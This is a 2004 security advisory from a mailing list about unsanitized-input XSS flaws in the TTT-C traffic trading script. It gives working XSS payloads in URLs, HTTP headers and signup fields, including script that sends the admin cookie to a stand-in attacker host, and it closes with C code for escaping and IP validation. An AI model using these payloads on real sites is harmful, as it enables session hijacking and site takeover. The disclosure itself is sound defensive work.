[UNIX] TTT-C Multiple Cross-Site Scripting

From: SecuriTeam (support_at_securiteam.com)
Date: 05/18/04

    To: list@securiteam.com
    Date: 18 May 2004 18:28:05 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      TTT-C Multiple Cross-Site Scripting
    ------------------------------------------------------------------------

    SUMMARY

    "The World's Most Advanced Free C Traffic Trading Script.
    <http://www.turbotraffictrader.com/> Turbo Traffic Trader C 1.0 is an
    advanced trading script written entirely in C/Sqlite, it offers you
    advanced features that cannot be found in other FREE scripts."

    TTT-C does not sanitize its input variables. This makes cross-site
    scripting (XSS) trivial and, in some cases, allows complete hijacking
    of the site's traffic.

    DETAILS

    Vulnerable Systems:
     * Latest stable release, all betas and release candidates (RC)

    In TTT-C, no input variables are sanitized whatsoever, making it easy to
    insert HTML code inside the administrative interface. On sites with trade
    signup enabled it is also possible to hijack the admin interface and the
    administrator's cookie that could allow the attacker to take over the
    system. In addition, an attacker would be able to steal all traffic the
    site has.

    Some examples of XSS bugs in the 'Links' panel are provided:
    http://www.vulnerable.com/cgi-bin/ttt-out?link=testing%20%3Cscr!pt%3Ealert('from_browser_insert');%3C/scr!pt%3E
    http://www.vulnerable.com/cgi-bin/ttt-out?link=testing%20>alert('from_browser_insert');</scr!pt>

    Analysis of the IP Logs panel reveals that the logged IP address can be
    null or contain XSS code, and that the 'proxy' variable (taken from the
    X-Forwarded-For header) is likewise unsanitized. Example of the XSS in
    the 'proxy' variable:
    telnet www.vulnerable.com 80
    Trying www.vulnerable.com...
    Connected to www.vulnerable.com.
    Escape character is '^]'.
    GET /cgi-bin/ttt-in HTTP/1.1
    X-Forwarded-For: 192.168.0.1<scr!pt>alert('proxy_insert');</scr!pt>
    Host: www.vulnerable.com

    An example for the IP variable is given below, but local access is
    required in order to use it:
    export REMOTE_ADDR="127.0.0.1<scr!pt>alert('ip_inject');</scr!pt>"
    Running /ttt-in will then load one bad record for the IP.

    For the Referer Logs panel, the following is a similar example to that of
    the IP:
    telnet www.vulnerable.com 80
    Trying www.vulnerable.com...
    Connected to www.vulnerable.com.
    Escape character is '^]'.
    GET /cgi-bin/ttt-in HTTP/1.1
    X-Forwarded-For: 192.168.0.6<scr!pt>alert('proxy_insert');</scr!pt>
    Referer:
    http://www.referrer.com"<scr!pt>alert('referrer_inject');</scr!pt>"
    Host: www.vulnerable.com

    For the 'Edit' and 'Main' control panels, the following example will
    result in a complete takeover. However, you must sign up for a trade in
    order to perform it (signing up with bogus site information is
    possible):
    Site Name =
    http://www.owned.com"<scr!pt>cook=document.cookie;window.location='http://www.hacker.com/steal-admin-cookie.php?cook=' cook '';</scr!pt>
    Site URL =
    http://www.owned.com"<scr!pt>cook=document.cookie;window.location='http://www.hacker.com/steal-admin-cookie.php?cook=' cook '';</scr!pt>
    Webmaster e-mail =
    email@something.com"<scr!pt>alert('email_inject');</scr!pt>
    Webmaster ICQ = 123456"<scr!pt>alert('ICQ_inject');</scr!pt>
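
    Every example above is the same defect: a CGI variable (link, REMOTE_ADDR,
    X-Forwarded-For, Referer, site name, URL, e-mail, ICQ) is stored and later
    written into the admin panel's HTML without escaping. The following is an
    added illustration in C, not TTT-C's own code, of the two checks that close
    it: entity-encoding on output and rejecting an IP Logs value that is not an
    IP address. The function names and the sample input are constructed.

```c
/* Added example (not TTT-C's own code): output escaping and IP validation
 * for a C CGI log writer, so header values cannot carry markup into HTML. */
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>

/* HTML-escape src into dst (dst_len bytes incl. NUL). Returns dst, or NULL
 * when the escaped form would not fit. Encoding these five characters makes
 * a stored "<scr!pt>" payload render as text instead of executing. */
char *html_escape(const char *src, char *dst, size_t dst_len)
{
    size_t n = 0;
    for (; *src; src++) {
        const char *rep;
        char one[2] = { *src, 0 };
        switch (*src) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t rl = strlen(rep);
        if (n + rl >= dst_len)
            return NULL;
        memcpy(dst + n, rep, rl);
        n += rl;
    }
    dst[n] = '\0';
    return dst;
}

/* The IP Logs panel stored whatever REMOTE_ADDR / X-Forwarded-For held, even
 * an empty string or a script tag. Accept only a well-formed IPv4 address. */
int valid_ipv4(const char *s)
{
    struct in_addr a;
    return s != NULL && *s != '\0' && inet_pton(AF_INET, s, &a) == 1;
}

int main(void)
{
    const char *proxy = "192.168.0.1<scr!pt>alert('x');</scr!pt>"; /* constructed */
    char out[256];
    printf("valid ip: %d\n", valid_ipv4(proxy));
    printf("escaped : %s\n", html_escape(proxy, out, sizeof out));
    return 0;
}
```

    Applied to the advisory's proxy example, the value fails the IP check and
    is dropped from the log; had it reached the panel, the escaped form would
    display literally rather than run.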

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:spam@icefire.org> Kaloyan
    Georgiev (ICEFIRE).


